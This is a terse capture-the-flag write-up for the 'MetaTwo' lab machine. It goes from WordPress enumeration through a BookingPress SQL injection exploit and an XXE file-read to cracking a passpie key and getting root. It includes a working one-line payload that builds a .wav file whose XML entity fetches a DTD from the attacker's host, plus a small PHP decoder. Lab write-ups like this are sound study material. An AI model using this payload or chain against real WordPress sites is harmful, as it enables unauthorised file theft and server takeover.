MetaTwo

Enumeration

Ports and Services

Software Installed:

• WordPress version 5.6.2

Nmap Scan Results:

Robots.txt:

Initial Foothold

Found vulnerable plugin:

Found python script and tested
URL: https://github.com/destr4ct/CVE-2022-0739/blob/main/booking-press-expl.py
Note: Get the nonce from looking at a post request via burp

Cracked hash for manager:

Using bookingpress-appointment-booking:

https://blog.sonarsource.com/wordpress-xxe-security-vulnerability/

Verified vuln by creating a .wav file and uploading it:

echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.10.14.44:80/test.dtd'"'"'>%remote;%init;%trick;] >\x00'> test.wav

**

To decode:**

decode.php

<?php
 echo zlib_decode(base64_decode('<hasehed>')); 
?>

**Then run php -f decode.php

Got a copy of wp-config:

Same method /etc/passwd:

FTP User/password works:

In mailer folder is send-email.php which has a password for jnelson:

User.txt Proof Screenshot**

Privilege Escalation

User is using passpie for password management

Found private key:
/home/jnelson/.passpie/.keys:

Decrypted password:
gpg2john and john

Exported root:

SU to root

RootScreenshot Here: